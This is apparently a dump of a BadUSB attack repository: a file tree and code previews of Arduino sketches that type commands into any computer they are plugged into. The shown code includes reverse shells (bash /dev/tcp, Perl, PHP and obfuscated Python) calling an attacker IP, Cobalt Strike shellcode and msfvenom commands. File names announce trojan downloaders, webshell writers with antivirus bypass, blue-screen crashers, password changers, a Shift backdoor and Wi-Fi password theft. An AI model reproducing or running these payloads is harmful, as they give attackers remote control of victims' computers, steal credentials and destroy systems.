├── MSF_Trojanlinkage/
│ ├── Shell_TrojanGenerationConfiguration.txt
│ ├── shell.apk
│ ├── shell.asp
│ ├── shell.aspx
│ ├── shell.elf
│ ├── shell.jar
│ ├── shell.jsp
│ ├── shell.macho
│ ├── shell.php
│ ├── shell.pl
│ ├── shell.psl
│ ├── shell.py
│ ├── shell.sh
│ └── shell.war
├── OSX_Built-inReverseShell/
│ ├── OSX_SystemReverseConnection (dns_shell).ino
│ ├── OSX_SystemReverseConnection (perl_shell).ino
│ └── OSX_SystemReverseConnection (ruby_shell).ino
├── PSL_FullScreen-HACKED/
│ ├── FullScreenHackedv0/
│ │ ├── FullScreenHackedv/
│ │ │ └── FullScreenHackedv.ino
│ │ └── get.ps1
│ ├── FullScreenHackedv2/
│ │ ├── FullScreenHackedv2.ino
│ │ └── wall.ps1
│ └── FullScreenHackedv3[慎用]/
│ ├── FullScreenHackedv3/
│ │ └── FullScreenHackedv3.ino
│ └── get.ps1
├── README.cn.md
├── README.md
├── RunProgramOn_UDrive_ExpandScopeOfIntrusion/
│ ├── UdiskRun/
│ │ └── UdiskRun.ino
│ ├── UdiskRunv2/
│ │ └── UdiskRunv2.ino
│ └── UdiskRunv3/
│ └── UdiskRunv3.ino
├── Site_AWord_IntrusionCode/
│ ├── AspSentenceTrojanWrite(webServerVersion).ino
│ ├── AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
│ ├── AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
│ ├── AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
│ ├── AspxSentenceTrojanWrite(webServerVersion).ino
│ ├── JspSentenceTrojanWritten (JSP_websiteServerUse).ino
│ ├── JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
│ ├── PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
│ ├── PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
│ └── PHP_TrojanWrite(usedByPHP_websiteServer).ino
├── SpecificFunctionCode/
│ ├── AddUserCode(Tools).ino
│ ├── Alt-f4_Loop.ino
│ ├── ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
│ ├── EnablePSL_RemoteConnection(Tools).ino
│ ├── ForceShutDownCommand(Tool).ino
│ ├── ForcedDeletionOf360Processes(Tools).ino
│ ├── Hide_CMD_Window(Display).ino
│ ├── MouseKeepsMoving(Tools).ino
│ ├── OpenPort445.ino
│ ├── OpenSpecified_webPage.ino
│ ├── ShiftBackdoor.ino
│ ├── SimplyChangeAllUsersPasswords(TrickItem).ino
│ ├── SimplyShutDownMachine(TrickItem).ino
│ └── TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
├── TrojanDownloader/
│ ├── CERTUTIL_DownLoader/
│ │ └── CERTUTIL_DownLoader_MSF.ino
│ ├── FTP_DownLoader/
│ │ └── FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
│ ├── JAVA_DownLoader/
│ │ ├── JavaTrojanWrite(TargetEnvironmentRunJava).ino
│ │ └── server.java
│ ├── PSL_DownLoader/
│ │ ├── Downloa_PSL_Trojan-Execute_aSecondTime.ino
│ │ ├── LinkServer_MSF_PSL_Download.ino
│ │ ├── LinkServer_PSL_Download.ino
│ │ ├── PSL_DownLoader0.ino
│ │ ├── PSL_DownLoader1.ino
│ │ ├── PSL_DownLoader2.ino
│ │ ├── PSL_DownLoader3.ino
│ │ ├── PSL_DownLoader4.ino
│ │ ├── PSL_Downloader_Win&Linux_General.ino
│ │ └── PSL_Writes_Bounces.ino
│ └── PY_DownLoader/
│ ├── PyShellServer.py
│ └── Py_TrojanWrite(TargetEnvironmentRunPython).ino
├── Ubuntu_InformationGathering/
│ ├── BasicTerminalCommandsForUbuntu(Display).ino
│ └── UbuntuInformationCollectionTXT_File(Information).ino
├── WiFi_ConnectionTrojan/
│ └── ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
└── WiFi_PasswordAcquisition/
├── WiFiPasswordCapture(tool).ino
└── WiFiPasswordExport(tool).ino
SYMBOL INDEX (9 symbols across 2 files)
FILE: TrojanDownloader/JAVA_DownLoader/server.java
class Server (line 6) | public class Server extends Frame
method Server (line 13) | public Server()
method main (line 48) | public static void main(String[]args)
FILE: TrojanDownloader/PY_DownLoader/PyShellServer.py
class servers (line 21) | class servers:
method __init__ (line 28) | def __init__(self,server_address):
method connec (line 32) | def connec(self):
method handle_client (line 44) | def handle_client(self):
method main (line 71) | def main(self):
function mains (line 83) | def mains():
Condensed preview — 106 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (274K chars).
[
{
"path": "AddUser_StartService/AddUser_Enable3389(tools).ino",
"chars": 1371,
"preview": "void setup(){\n Keyboard.begin();\n delay(3000);\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500); \n Keyboard.press("
},
{
"path": "AddUser_StartService/AddUser_EnableFTP(tools).ino",
"chars": 1155,
"preview": "void setup() {\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500); \n K"
},
{
"path": "BlueScreen/BlueScreen1(DOS).ino",
"chars": 535,
"preview": "//CMD蓝屏代码\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n d"
},
{
"path": "BlueScreen/BlueScreen2(DOS).ino",
"chars": 775,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(20000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500)"
},
{
"path": "BlueScreen/BlueScreen3(DOS).ino",
"chars": 536,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500)"
},
{
"path": "BlueScreen/BlueScreen_xp_win7(DOS).ino",
"chars": 679,
"preview": "#include<Keyboard.h>\n\nvoid setup() \n{\n //初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_"
},
{
"path": "BlueScreen/DelayedBlueScreen (DOS).ino",
"chars": 967,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "BlueScreen/RegistryWriteBlueScreen (DOS).ino",
"chars": 661,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino",
"chars": 655,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino",
"chars": 673,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c",
"chars": 3250,
"preview": "/* length: 800 bytes */\nunsigned char buf[] = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs",
"chars": 4855,
"preview": "/* length: 800 bytes */\nbyte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java",
"chars": 4852,
"preview": "/* length: 800 bytes */\nbyte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl",
"chars": 3231,
"preview": "# length: 800 bytes\n$buf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1",
"chars": 3026,
"preview": "Set-StrictMode -Version 2\n\n$eicar = 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\n\n$DoIt = @'\n$"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py",
"chars": 3229,
"preview": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb",
"chars": 3229,
"preview": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct",
"chars": 20929,
"preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\t<registration progid=\"e00684\" classid=\"{53cb5c98-fa0e-4378-99a4-8743642ed01d}\" >\n\t\t<s"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt",
"chars": 3200,
"preview": "\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff"
},
{
"path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba",
"chars": 2768,
"preview": "myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1"
},
{
"path": "CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino",
"chars": 658,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino",
"chars": 631,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino",
"chars": 818,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino",
"chars": 607,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "CodePrincipleInterpretation/ArduinoKeyCodeBase.ino",
"chars": 745,
"preview": "//基础按键\nKEY_LEFT_CTRL\nKEY_LEFT_SHIFT\nKEY_LEFT_ALT\nKEY_LEFT_GUI //win键\nKEY_RIGHT_CTRL\nKEY_RIGHT_SHIFT\nKEY_RIGHT_ALT\nKEY_RI"
},
{
"path": "CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt",
"chars": 213,
"preview": "ʲôsetup\n setup BadusbڲϺ״ִеĴ\n Badusbͨʹõľsetup\n ֻҪд\n void setup(){//д}\n\nʲôloop\n loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ\n"
},
{
"path": "CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt",
"chars": 2409,
"preview": "msf木马制作\n\n1、在攻击者终端操作:\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport=<Your Port> -f exe >/root/Desktop/ev"
},
{
"path": "DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino",
"chars": 464,
"preview": "void setup() {\n Keyboard.begin();//开始键盘通讯 \n delay(3000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500); \n K"
},
{
"path": "DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino",
"chars": 762,
"preview": "void setup(){\n Keyboard.begin();\n delay(3000);\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500); \n Keyboard.press("
},
{
"path": "LICENSE",
"chars": 1503,
"preview": "BSD 3-Clause License\n\nCopyright (c) 2021, wwy\nAll rights reserved.\n\nRedistribution and use in source and binary forms, w"
},
{
"path": "Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino",
"chars": 1026,
"preview": "\n\nvoid setup()\n{\n delay(5000);\n terminal();\n delay(3000);\n Keyboard.println(\"echo INPUT0 > /tmp/pay\");\n delay(100);"
},
{
"path": "Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino",
"chars": 807,
"preview": "\n# define PAYLOAD1 \"mknod bp1 p && nc INPUT0 INPUT1 0<bp1 | /bin/bash 1>bp1 &\"\n//# define PAYLOAD2 \"/bin/bash -i > /dev/"
},
{
"path": "Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino",
"chars": 794,
"preview": "\n\nvoid setup()\n{\n delay(5000);\n terminal();\n delay(3000);\n Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n delay("
},
{
"path": "MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt",
"chars": 1510,
"preview": "\nIP192.168.43.242\nport4444\n\n\nexeľ\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -"
},
{
"path": "MSF_Trojanlinkage/shell.asp",
"chars": 38551,
"preview": "<% @language=\"VBScript\" %>\n<% \n\tSub gJjCrDeBtLBn()\n\t\twvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&"
},
{
"path": "MSF_Trojanlinkage/shell.aspx",
"chars": 2831,
"preview": "<%@ Page Language=\"C#\" AutoEventWireup=\"true\" %>\n<%@ Import Namespace=\"System.IO\" %>\n<script runat=\"server\">\n private"
},
{
"path": "MSF_Trojanlinkage/shell.jsp",
"chars": 1500,
"preview": "<%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>"
},
{
"path": "MSF_Trojanlinkage/shell.php",
"chars": 1115,
"preview": "/*<?php /**/ error_reporting(0); $ip = '192.168.43.242'; $port = 4444; if (($f = 'stream_socket_client') && is_callable("
},
{
"path": "MSF_Trojanlinkage/shell.pl",
"chars": 233,
"preview": "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::I"
},
{
"path": "MSF_Trojanlinkage/shell.psl",
"chars": 2802,
"preview": "function yI6 {\n\tParam ($pwJF, $eI)\t\t\n\t$pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAsse"
},
{
"path": "MSF_Trojanlinkage/shell.py",
"chars": 454,
"preview": "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdH"
},
{
"path": "MSF_Trojanlinkage/shell.sh",
"chars": 68,
"preview": "0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202"
},
{
"path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino",
"chars": 734,
"preview": "\nvoid setup()\n{\n delay(5000);\n run(\"terminal\");\n delay(3000);\n Keyboard.print(\"nslookup -querytype=txt INPUT0 |\");\n "
},
{
"path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino",
"chars": 806,
"preview": "\n\nvoid setup()\n{\n delay(5000);\n run(\"terminal\");\n delay(3000);\n Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n d"
},
{
"path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino",
"chars": 777,
"preview": "\nvoid setup()\n{\n \n delay(5000);\n run(\"terminal\");\n delay(3000);\n Keyboard.print(\"ruby -rsocket -e 'exit if fork;\""
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino",
"chars": 1014,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1",
"chars": 528,
"preview": "cd \\;\n(New-Object System.Net.Webclient).DownloadFile(\"http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg\",\"c:\\x"
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino",
"chars": 539,
"preview": "void setup() {\n Keyboard.begin();\n delay(5000);\n Keyboard.press(KEY_LEFT_GUI);\n delay(500); \n Keyboard.press('r');\n"
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1",
"chars": 1338,
"preview": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).Down"
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino",
"chars": 877,
"preview": "void setup(){\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500); \n Ke"
},
{
"path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1",
"chars": 1338,
"preview": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).Down"
},
{
"path": "README.cn.md",
"chars": 7883,
"preview": "# BadUSB\n<br>\n该项目利用USB协议上的漏洞,通过更改USB的内部固件,在接入USB接口后,模拟外置鼠标、键盘的功能,以此"
},
{
"path": "README.md",
"chars": 12111,
"preview": "# BadUSB\n<br>\nThis project takes advantage of the loophole in USB p"
},
{
"path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino",
"chars": 1250,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino",
"chars": 1003,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino",
"chars": 941,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino",
"chars": 1773,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino",
"chars": 2189,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino",
"chars": 1953,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino",
"chars": 2357,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino",
"chars": 1820,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino",
"chars": 2185,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino",
"chars": 6285,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino",
"chars": 2455,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino",
"chars": 2533,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino",
"chars": 1781,
"preview": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK"
},
{
"path": "SpecificFunctionCode/AddUserCode(Tools).ino",
"chars": 832,
"preview": "#include <Keyboard.h>\n\nvoid setup() {\n // 这里执行一次\n Keyboard.begin();//开始键盘通讯 \n delay(2000);//初始化时间\n Keyboard.press(KE"
},
{
"path": "SpecificFunctionCode/Alt-f4_Loop.ino",
"chars": 118,
"preview": "void setup() {//初始化\nKeyboard.begin();\n}\nvoid loop()//循环\n{\n Keyboard.press(KEY_LEFT_ALT);\n Keyboard.press(KEY_F4);\n}\n"
},
{
"path": "SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino",
"chars": 2816,
"preview": "#include<Keyboard.h>\nvoid setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_CAPS_LOCK)"
},
{
"path": "SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino",
"chars": 721,
"preview": "#define BOARDTYPE\n#ifdef TEENSY2\n #include<usb_private.h>\n#endif\n\n# define PAYLOAD_USER_ADD \"net user INPUT0 INPUT1 /"
},
{
"path": "SpecificFunctionCode/ForceShutDownCommand(Tool).ino",
"chars": 468,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(3000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino",
"chars": 1720,
"preview": "void setup() {\nMouse.begin();//鼠标事件开始\nKeyboard.begin();\ndelay(7000);\n for(int i=0;i<20;i++){\n Mouse.move(-127,-127);//"
},
{
"path": "SpecificFunctionCode/Hide_CMD_Window(Display).ino",
"chars": 870,
"preview": "//隐藏CMD窗口\nvoid setup() {\n Keyboard.begin();\n delay(3000);\n Keyboard.press(KEY_LEFT_GUI);\n delay(200); \n Keyboard.pr"
},
{
"path": "SpecificFunctionCode/MouseKeepsMoving(Tools).ino",
"chars": 109,
"preview": "void setup() {\nMouse.begin();\n}\nvoid loop() {\nMouse.move(10,0);\ndelay(800);\nMouse.move(-10,0);\ndelay(800);\n}\n"
},
{
"path": "SpecificFunctionCode/OpenPort445.ino",
"chars": 809,
"preview": "#include \"DigiKeyboard.h\"\n#define KEY_ESC 41\n#define KEY_BACKSPACE 42\n#define KEY_TAB 43\n#define KEY_PRT_SCR 70\n"
},
{
"path": "SpecificFunctionCode/OpenSpecified_webPage.ino",
"chars": 501,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(3000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(200);"
},
{
"path": "SpecificFunctionCode/ShiftBackdoor.ino",
"chars": 1908,
"preview": "//Lemon_C Device Library\n//shop117137052.taobao.com\nvoid setup() {//初始化\n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI"
},
{
"path": "SpecificFunctionCode/SimplyChangeAllUsersPasswords(TrickItem).ino",
"chars": 595,
"preview": "#include<Keyboard.h>\nvoid setup() \n{//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI)"
},
{
"path": "SpecificFunctionCode/SimplyShutDownMachine(TrickItem).ino",
"chars": 637,
"preview": "#include <Keyboard.h>\n\nvoid setup()\n {\n // put your setup code here, to run once:\n Keyboard.begin();//开始键盘通讯\n delay(5"
},
{
"path": "SpecificFunctionCode/TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino",
"chars": 2490,
"preview": "#define BOARDTYPE\n#ifdef TEENSY2\n #include<usb_private.h>\n#endif\n\n\nvoid setup(){\ndelay(3000);\n wait_for_drivers(2000"
},
{
"path": "TrojanDownloader/CERTUTIL_DownLoader/CERTUTIL_DownLoader_MSF.ino",
"chars": 705,
"preview": "#include<Keyboard.h>\nvoid setup()\n{\n Keyboard.begin();//ʼͨ\n delay(4000);//ʱ1000룬Ҫ̫̣ΪÿԵٶȶһ\n Keyboard.press(KEY_CAPS_LO"
},
{
"path": "TrojanDownloader/FTP_DownLoader/FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino",
"chars": 1679,
"preview": "void setup() {\n Keyboard.begin();\n delay(10000);//延时\n Keyboard.press(KEY_LEFT_GUI);\n delay(200); \n Keyboard.print('"
},
{
"path": "TrojanDownloader/JAVA_DownLoader/JavaTrojanWrite(TargetEnvironmentRunJava).ino",
"chars": 5931,
"preview": "void setup() {\n Keyboard.begin();\n delay(10000);//延时\n Keyboard.press(KEY_LEFT_GUI);\n delay(200); \n Keyboard.print('"
},
{
"path": "TrojanDownloader/JAVA_DownLoader/server.java",
"chars": 1010,
"preview": "import java.io.*; \nimport java.net.*; \nimport java.awt.*; \nimport java.awt.event.*;\n \npublic class Server extends Frame "
},
{
"path": "TrojanDownloader/PSL_DownLoader/Downloa_PSL_Trojan-Execute_aSecondTime.ino",
"chars": 648,
"preview": "void setup() {\n Keyboard.begin();\n delay(5000);\n Keyboard.press(KEY_LEFT_GUI);\n delay(500); \n Keyboard.press('r');\n"
},
{
"path": "TrojanDownloader/PSL_DownLoader/LinkServer_MSF_PSL_Download.ino",
"chars": 1611,
"preview": "#include<Keyboard.h>\n\nvoid setup() \n{ //初始化,这里的代码只执行一次\ndelay(5000); //设置延时,让系统有足够的时间识别BadUsb5,防止后续代码执行错乱。\ndelay(1000);Ke"
},
{
"path": "TrojanDownloader/PSL_DownLoader/LinkServer_PSL_Download.ino",
"chars": 1137,
"preview": "#include<Keyboard.h>\n//Arduino Leonardo\n\nvoid setup()\n{ //初始化\nKeyboard.begin();//开始键盘通信\ndelay(1000);//延时1000毫秒,\nKeyboard"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader0.ino",
"chars": 519,
"preview": "#include \"DigiKeyboard.h\"\n\nvoid setup() \n{\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(0);\nDigiKeyboard.delay(3"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader1.ino",
"chars": 750,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader2.ino",
"chars": 679,
"preview": " void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500)"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader3.ino",
"chars": 740,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(20000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500)"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader4.ino",
"chars": 1047,
